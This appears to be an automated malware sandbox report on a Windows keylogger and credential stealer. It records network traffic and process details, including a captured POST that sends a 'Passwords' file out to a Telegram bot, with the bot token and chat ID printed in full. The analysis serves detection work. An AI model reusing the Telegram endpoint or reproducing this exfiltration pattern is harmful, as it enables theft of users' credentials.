Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 23:44:31.974431992 CET	192.168.2.5	1.1.1.1	0x9125	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:44:32.957355976 CET	192.168.2.5	1.1.1.1	0x19aa	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:44:39.198900938 CET	192.168.2.5	1.1.1.1	0x901b	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 23:44:31.981518030 CET	1.1.1.1	192.168.2.5	0x9125	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 23:44:31.981518030 CET	1.1.1.1	192.168.2.5	0x9125	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:44:31.981518030 CET	1.1.1.1	192.168.2.5	0x9125	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:44:31.981518030 CET	1.1.1.1	192.168.2.5	0x9125	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:44:31.981518030 CET	1.1.1.1	192.168.2.5	0x9125	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:44:31.981518030 CET	1.1.1.1	192.168.2.5	0x9125	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:44:32.967778921 CET	1.1.1.1	192.168.2.5	0x19aa	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:44:32.967778921 CET	1.1.1.1	192.168.2.5	0x19aa	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:44:32.967778921 CET	1.1.1.1	192.168.2.5	0x19aa	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:44:32.967778921 CET	1.1.1.1	192.168.2.5	0x19aa	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:44:32.967778921 CET	1.1.1.1	192.168.2.5	0x19aa	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:44:32.967778921 CET	1.1.1.1	192.168.2.5	0x19aa	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:44:32.967778921 CET	1.1.1.1	192.168.2.5	0x19aa	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:44:39.205583096 CET	1.1.1.1	192.168.2.5	0x901b	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49706	132.226.247.73	80	2276	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:44:31.998888969 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 23:44:32.702743053 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:44:32 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 23:44:32.719873905 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 23:44:32.940507889 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:44:32 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 23:44:38.976475000 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 23:44:39.194278002 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:44:39 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49707	104.21.48.1	443	2276	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:44:33 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 22:44:33 UTC	855	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:44:33 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1863862 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s6vN%2FrLhTN%2FgNj0k3dLTBnV0Cn1DZn8ouLAWF1FETRtKBz5uTYGB9nsto1YaO09bHJkEWFx0CdewX18QKLWbEDKWabIvNHjWJxgnCHnCh14S3Goh2qb%2BRCkPQMrVs1FUP1iyhYrI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9000313efa95c461-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1614&rtt_var=608&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1794714&cwnd=228&unsent_bytes=0&cid=06eab7896491c63e&ts=284&x=0"
2025-01-10 22:44:33 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49711	149.154.167.220	443	2276	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:44:39 UTC	296	OUT	POST /bot7808791546:AAHW1HtuPv5PTKyABxs64lTNvFxWfoJO5x4/sendDocument?chat_id=6790572687&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd319e7496d93b Host: api.telegram.org Content-Length: 1088 Connection: Keep-Alive
2025-01-10 22:44:39 UTC	1088	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 39 65 37 34 39 36 64 39 33 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd319e7496d93bContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:44:40 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 22:44:40 GMT Content-Type: application/json Content-Length: 560 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:44:40 UTC	560	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 30 38 37 39 31 35 34 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 4f 56 41 32 30 32 35 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 61 6d 6d 79 73 75 6e 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 37 39 30 35 37 32 36 38 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 41 4d 55 45 4c 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 53 55 4e 4e 59 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 42 49 47 5f 53 41 4d 4d 59 39 30 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 39 30 38 30 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":165,"from":{"id":7808791546,"is_bot":true,"first_name":"NOVA2025","username":"sammysunbot"},"chat":{"id":6790572687,"first_name":"SAMUEL","last_name":"SUNNY","username":"BIG_SAMMY90","type":"private"},"date":1736549080,"d

Target ID:	0
Start time:	17:44:30
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\z87sammylastborn.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\z87sammylastborn.exe"
Imagebase:	0x600000
File size:	205'312 bytes
MD5 hash:	A5211C64910B02B059F301B05DE54B16
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	17:44:31
Start date:	10/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x6f0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	13.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	7%
Total number of Nodes:	546
Total number of Limit Nodes:	40

Executed Functions

Function 0507A6A0 Relevance: 1.9, Strings: 1, Instructions: 650
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(, xrefs: 0507AF04

Memory Dump Source

Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 4b135ca26c67ae13b0a78943587843c2351c4f7159190a09fd8bc587c5ebc8a9
Instruction ID: 6e809990b37a0a9ceb029ea5732914be867d54ce47a376e1e04e720451fb6ebf
Opcode Fuzzy Hash: 4b135ca26c67ae13b0a78943587843c2351c4f7159190a09fd8bc587c5ebc8a9
Instruction Fuzzy Hash: 8362C374E012288FDB64DF69C994BDDBBB2BF89304F1081E9D409AB295DB359E85CF40

Function 0507A691 Relevance: .5, Instructions: 518COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e5798699027bfd4dde93119a7808178feb2e6afacee4d1cc65097783dc6c542
Instruction ID: 7207b7bd294776346ba92d6c38ef83168f0469ca1ca8f7368f1bf6067f29940c
Opcode Fuzzy Hash: 3e5798699027bfd4dde93119a7808178feb2e6afacee4d1cc65097783dc6c542
Instruction Fuzzy Hash: F742D570E012288FDB64DF69C954BDDBBB2BF89304F1481EAD409AB295DB359E85CF40

Function 06C51648 Relevance: .4, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2085374836.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_z87sammylastborn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 411915ab7cca12a901459814d0b6bce4ae440fadfa3570ff85ec12a3cd3d4820
Instruction ID: 7336a65ffbfda9b1c94eb42c32f772ac96692f60d9877c751eff071f87575115
Opcode Fuzzy Hash: 411915ab7cca12a901459814d0b6bce4ae440fadfa3570ff85ec12a3cd3d4820
Instruction Fuzzy Hash: 49F12C70E00209CFDB54DFA9C948B9DBBF1FF88304F1A8169D805AB765DB749985CB84

Function 0507C8F0 Relevance: .4, Instructions: 356COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 354082fdf892821fe5331778c39a459da0d79ed703002a615170b592aec9eabc
Instruction ID: 401686843993e3e66a48ad74d90930a349ffab423a60a1240d22bdfd3d5cf0bf
Opcode Fuzzy Hash: 354082fdf892821fe5331778c39a459da0d79ed703002a615170b592aec9eabc
Instruction Fuzzy Hash: A2D1BA71B006098FEB69DB75D460BAE77FABF89300F148469E046CB291DB39ED02CB55

Function 05078358 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f86ebb4de9d4f6e55b9ba89b8401ab709a2193ffbbc2d724299c1fb2b4de6c8
Instruction ID: cef9b6f7792f4b3a9e75fdd60a2b186e6c61c0f5a57a4c4a03aacdfd38cfc331
Opcode Fuzzy Hash: 4f86ebb4de9d4f6e55b9ba89b8401ab709a2193ffbbc2d724299c1fb2b4de6c8
Instruction Fuzzy Hash: 1361C174E05218CFCB14CFAAD594AADFBF2BF89300F24916AD815AB355DB349842CF54

Function 05078E58 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f97d425b7766e8f4a33ccf6b2b9b5b3ce1d3fb2f19c6b0c352425ca53870634
Instruction ID: a2e067d8ac95dd8531760c0c387a3a312c3f29c9ebb0fb93ba0d0e67fb257227
Opcode Fuzzy Hash: 8f97d425b7766e8f4a33ccf6b2b9b5b3ce1d3fb2f19c6b0c352425ca53870634
Instruction Fuzzy Hash: 2571E4B4E00218CFDB14DFA9D5846AEBBF2FF89300F208569E815AB364DB349945CF54

Function 05078348 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7074dffc09a7093392e8f00d70cb3c8e02da8f50e2ace768cbd52f165b23d7f3
Instruction ID: 0d092377ffbdceab075bad3d32d14da1f32fbb652b560577f07f4cdc024b96d6
Opcode Fuzzy Hash: 7074dffc09a7093392e8f00d70cb3c8e02da8f50e2ace768cbd52f165b23d7f3
Instruction Fuzzy Hash: 7B31D4B5E012188FDB18CFAAD5846DDBBF2FF89310F14C06AD808AB254DB755946CF14

Function 00CAD540 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00CAD5BE
GetCurrentThread.KERNEL32 ref: 00CAD5FB
GetCurrentProcess.KERNEL32 ref: 00CAD638
GetCurrentThreadId.KERNEL32 ref: 00CAD691

Memory Dump Source

Source File: 00000000.00000002.2082103434.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_z87sammylastborn.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 8910d13e46b386f77c1f9cd76291868f05fbada2cca94cf42b12625b79523922
Instruction ID: 471791cde10424e2b9cca0ebe329debd1d8d0abe7960180e42243cae3bad9e5a
Opcode Fuzzy Hash: 8910d13e46b386f77c1f9cd76291868f05fbada2cca94cf42b12625b79523922
Instruction Fuzzy Hash: D05157B09002498FDB18DFA9D548B9EBBF5FF89308F20C459E01AA7360D7785984CB65

Function 0507A30C Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0507A54E

Memory Dump Source

Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 7b593d8c164d68017e3736b0c2957b314deb5373ce28e19b89609967fcb667f6
Instruction ID: dc7f3a2620c3a82e042415011c49519c6941611b7c0278d75403da84210cba1b
Opcode Fuzzy Hash: 7b593d8c164d68017e3736b0c2957b314deb5373ce28e19b89609967fcb667f6
Instruction Fuzzy Hash: BAA16971E00219DFDB20DFA8D845BAEBBF2BF48310F148169E809A7290DB759981CF95

Function 0507A318 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0507A54E

Memory Dump Source

Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0f7a9f9095cc6ca39950810cfa14a6a5a9fb21909e4f9dfab41fb9fb036a99e3
Instruction ID: bee36616521d6860120d3f32cfc263d7fbdb88f9b63738d43750ee836230eb9d
Opcode Fuzzy Hash: 0f7a9f9095cc6ca39950810cfa14a6a5a9fb21909e4f9dfab41fb9fb036a99e3
Instruction Fuzzy Hash: C9914871E0021DDFDB20DFA8D845BAEBBF2BF48310F148169E809A7290DB759985CF95

Function 00CAB298 Relevance: 1.7, APIs: 1, Instructions: 201
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00CAB4FE

Memory Dump Source

Source File: 00000000.00000002.2082103434.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_z87sammylastborn.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2e7fcb61c841eeb300aa9d5f6ee868fd4237a6fa6d0d8f04a8589d9faf04a531
Instruction ID: 0538486e1c82ef00637ca5dfc472cc8de7f60ad694e7f775e80d1a81354e2abe
Opcode Fuzzy Hash: 2e7fcb61c841eeb300aa9d5f6ee868fd4237a6fa6d0d8f04a8589d9faf04a531
Instruction Fuzzy Hash: 83818A70A00B468FDB24CF69D44079ABBF1FF89304F10892EE09AD7A51DB79E945CB90

Function 0507437C Relevance: 1.7, APIs: 1, Instructions: 161
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 0507ED50

Memory Dump Source

Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 7f28fe6b5cf360d19e03060a5d17c7d229bcb3afe844d8f3d43bd00a693b7089
Instruction ID: 31e6fa32369eaa34c50117458de8c9491880a53a990e8cf64501041bbba1c632
Opcode Fuzzy Hash: 7f28fe6b5cf360d19e03060a5d17c7d229bcb3afe844d8f3d43bd00a693b7089
Instruction Fuzzy Hash: 1B615870E0521DDFDB14DFA9E494BADBBBAFF48300F1084A9E415AB391CB35A885CB54

Function 06C51145 Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2085374836.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_z87sammylastborn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a498f502c3f616359abb4921281f63fc698473b5de2597be015430e480774407
Instruction ID: 1a3939ae4bf3c4735b6fead7c9fc7f85e1aa2f195265889b317948d114310981
Opcode Fuzzy Hash: a498f502c3f616359abb4921281f63fc698473b5de2597be015430e480774407
Instruction Fuzzy Hash: 1931D072C053958FDB01DFA9C8507DEBFF4EF55320F04806AD484A7252D7389A45CBA9

Function 04FA1334 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04FA4461

Memory Dump Source

Source File: 00000000.00000002.2084764830.0000000004FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fa0000_z87sammylastborn.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: e49a2e546f15fe0e51ca350dffed0b99b7e4c6e3fb0ef647db5c9708d2beb25c
Instruction ID: 72369b56b9460418954dba3ee0d4256cbc837ceaf202daf10038701cc98fd0ab
Opcode Fuzzy Hash: e49a2e546f15fe0e51ca350dffed0b99b7e4c6e3fb0ef647db5c9708d2beb25c
Instruction Fuzzy Hash: 5A4119B5A00205DFDB14CF99C488AABBBF5FF89318F24C459D919A7321D375A851CBA0

Function 00CA590C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00CA59C9

Memory Dump Source

Source File: 00000000.00000002.2082103434.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_z87sammylastborn.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
